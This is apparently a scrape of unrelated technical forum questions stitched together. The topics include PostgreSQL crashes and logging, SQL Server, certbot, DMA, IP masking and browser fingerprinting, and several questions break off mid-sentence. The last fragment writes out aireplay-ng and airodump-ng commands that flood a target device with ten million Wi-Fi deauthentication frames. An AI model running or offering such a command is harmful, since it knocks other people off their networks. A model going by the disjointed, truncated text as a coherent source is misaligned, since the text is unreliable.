PostgreSQL version : 12.4
Server: RHEL 7.9
I got postgres server into recovery mode for a minute and then came back normal.
Looking into logs, found this error before it went to recovery mode:
db=,user= LOG: server process (PID 4321) was terminated by signal 11: Segmentation fault db=,user= DETAIL: Failed process was running: select distinct some_col.some_state_id,case when some_col.some_state_id=99 then 'CENTRAL' else state.state_name_english end as stateNm,case when some_col.some_state_id=99 then 'AAA' else state.state_name_english end from xema.table_name_definition_mast defn_mast left join othe.get_state_list_fn() state on some_col.some_state_id=state.state_code where defn_mast.third_srvc_launch ='Y' and some_col.some_state_id < 100 order by 3
I doubt if this issue will come up again. Is this query specific or hardware problem? Got stuck.
Does activating the TF9567 seeding mode trace flag speed up the synchronization process in AlwaysOn?
I am using SQL Server 2019.
When running queries in MySQL workbench, some of them are captured to the log file at either:
However, I’d like to see ALL the possible queries that MySQL workbench does. Is there a way to do this on the client-side, i.e., where MySQL workbench is running? For example, it would be nice to see how these graphs are being generated and the system data is being grabbed, etc.:
I’ve been fighting for days now just to get god damn logging set up. I’ve had to write a ton of code manually because PG doesn’t provide any automated mechanism to do this, for some reason, nor even tells you anything, beyond this: https://www.postgresql.org/docs/12/runtime-config-logging.html#RUNTIME-CONFIG-LOGGING-CSVLOG
- Set up the
postgres_log table exactly like it says on that page.
- Set up my
postgresql.conf like this (also as it says on the page, except it only describes it vaguely and lets me find out everything on my own):
log_destination = 'csvlog' logging_collector = on log_directory = 'C:\pglogs' # Yes, I requires double \ chars or else it removes them entirely... log_filename = 'PG_%Y-%m-%d_%H;%M;%S' log_rotation_age = 1min log_rotation_size = 0 log_truncate_on_rotation = on
- Coded my own mechanism to constantly go through
C:\pglogs for any
.csv file, skipping any ones that PG reports are already in use with
pg_current_logfile, feed them into PG’s table and then delete the file. This took me a huge amount of time and effort and not a word about it was mentioned in that "manual".
- PostgreSQL creates both
PG_2020-09-20_00;56;19.csv (in CSV format) and
PG_2020-09-20_00;56;19 (in plaintext format) files. I obviously don’t want the extensionless files. Why are they created?
- Every minute (as specified) PG creates new log files, even if there’s nothing new to log. This results in an endless stream of empty log files (which my custom script goes through, "imports" and then deletes). How do I tell PG to stop doing that? It seems like pointless wear & tear on my disk to make empty files which are just deleted seconds later by my ever-running script.
- Why isn’t all of this automated? Why do I have to spend so much time to manually cobble together a solution to import the CSV files back into PG? In fact, why are they dumped to CSV files in the first place? Why doesn’t PG have the ability to directly log into that database table? It seems like a pointless exercise to dump CSV files which are only going to be COPYied back into the database and then deleted.
I need to make a dataset differentially private on which regression, which in more general sense could be extended to learning any model, is to be performed. I need to calculate the global sensitivity for adding noise. How do I calculate global sensitivity in such cases.
This web site runs under Apache on Windows. I installed Windows certbot client and ran it as suggested on its homepage, in webroot mode, since the web site cannot be stopped. This is what it reported:
C:\WWW\somedomain>certbot certonly --webroot Saving debug log to C:\Certbot\log\letsencrypt.log Plugins selected: Authenticator webroot, Installer None Please enter in your domain name(s) (comma and/or space separated) (Enter 'c' to cancel): somedomain.com Obtaining a new certificate Performing the following challenges: http-01 challenge for somedomain.com Input the webroot for somedomain.com: (Enter 'c' to cancel): c:\www\somedomain Waiting for verification... ←[31mChallenge failed for domain somedomain.com←[0m http-01 challenge for somedomain.com Cleaning up challenges ←[31mSome challenges have failed.←[0m ←[1m IMPORTANT NOTES: ←[0m - The following errors were reported by the server: Domain: somedomain.com Type: unauthorized Detail: Invalid response from http://somedomain.com/.well-known/acme-challenge/UIWHcmUsNd_4itYD5IWMLSuldIF4yzd2m9mpSH4W7a0 [2**.1**.1**.2**]: "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p" To fix these errors, please make sure that your domain name was entered correctly and the DNS A/AAAA record(s) for that domain contain(s) the right IP address.
The certbot server does query the right IP address, so the DNS record is working fine. I suspect that it may not be creating the challenge folder/file. I tried creating the above URL manually and querying it in a browser from elsewhere, and it is being served fine. Any ideas what is missing for certbot? Keep in mind that somedomain.com is only used here for example.
During burst mode in a DMA access, the DMAC has control over the bus for the whole transfer session which includes DATA PREPARATION time as well as DATA transfer time, after the transfer is over, the DMA relinquish the system bus. So in the mean time, the cpu can neither fetch any instruction from the MAIN MEMORY, nor it can fetch any operand, it can atmost complete the instruction it was executing before if that don’t include the use of system bus. In the book I have seen as cpu busy percent is given by
Data preparation time/(data prep time + data transfer time) How can the cpu be busy during the data preparation time when the bus is not with it. This can be the concept behind CYCLE STEAL mode, since it gains the bus only during data transfer, but how during burst mode??
My email service always logs the I.P. address of the device from which the email account was accessed(or an unsuccessful login attempt was made) for security reasons.
While going through the list once, I found that I had quite a few different I.P. addresses on that list, most of which were successful logins.
After some thinking, I remembered that I have been putting my phone on airplane mode quite often(which I still do, due to the internet connection dropping quite often at my home). I thought that this process was changing my I.P. address.
So, right now I checked for it again, and found that the last 2 octets of the IPv4 address changed everytime I switched ON(and then OFF) the airplane mode.
What is more interesting is the fact that the location of the device(checked on some online sites) was found to be oscillating between my city and a neighbouring satellite city.
So, my question is that, could this method, if used multiple times a day, act as a "free" I.P. masking service?
Today I switched ON the "Responsive Design Mode" under the "Web Developer" Section of the Firefox menu, and from the dropdown menu selected "iPhone X/XS iOS 12".
So now every webpage I visited was being sent the request that the screen size of my device was "375×812".
My question is that, can this method enhance my protection against browser fingerprinting(assuming I also take some other precautions)? Because the websites now wouldn’t be able to know my original aspect ratio/screen resolution, and above 2 iPhones are quite common too(I am using a laptop).
I earlier tried to scale the Firefox window to nearly the aspect ratio of a mobile phone, but that didn’t make any differnce at all.
(i) In the context of this question my adversaries are only the companies and their websites,and not the Governments & ISPs.
(ii) I am just asking about the effect of this method on my browser’s fingerprint, that is, whether it will increase or decrease the fingerprint. Be advised: I am not using this as the only method.
(iii) Firefox version: 78.0.2
(iv) OS: some linux distro.
I opened two terminals:
airodump-ng --bssid router mac --channel 6 wlan0
aireplay-ng --deauth 10000000 --a Router mac --c device mac wlan0
attack mode already specified